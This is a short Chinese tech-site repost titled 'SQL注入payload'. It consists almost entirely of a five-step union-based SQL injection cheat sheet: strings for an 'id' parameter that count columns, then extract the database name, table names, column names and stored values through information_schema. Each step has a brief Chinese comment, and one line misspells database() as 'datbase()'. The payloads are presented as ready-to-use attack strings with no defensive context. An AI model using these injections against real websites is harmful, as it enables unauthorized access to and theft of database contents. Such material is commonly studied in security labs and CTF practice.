首页 > 数据库技术 > 详细

SQL注入payload

时间:2021-08-30 06:22:45      阅读:11      评论:0      收藏:0      [点我收藏+]
id=‘1‘ order by 3 --+ //%20是空格,%23是#
id=‘2‘ and 1=2 union select 1,2,datbase()--+ //查数据库
id=‘3‘ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表
id=‘4‘ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+ //查字段
id=‘5‘ and 1=2 union select 1,2,[column name] from [table name] --+ //查值

SQL注入payload

原文:https://www.cnblogs.com/Zeker62/p/15194845.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!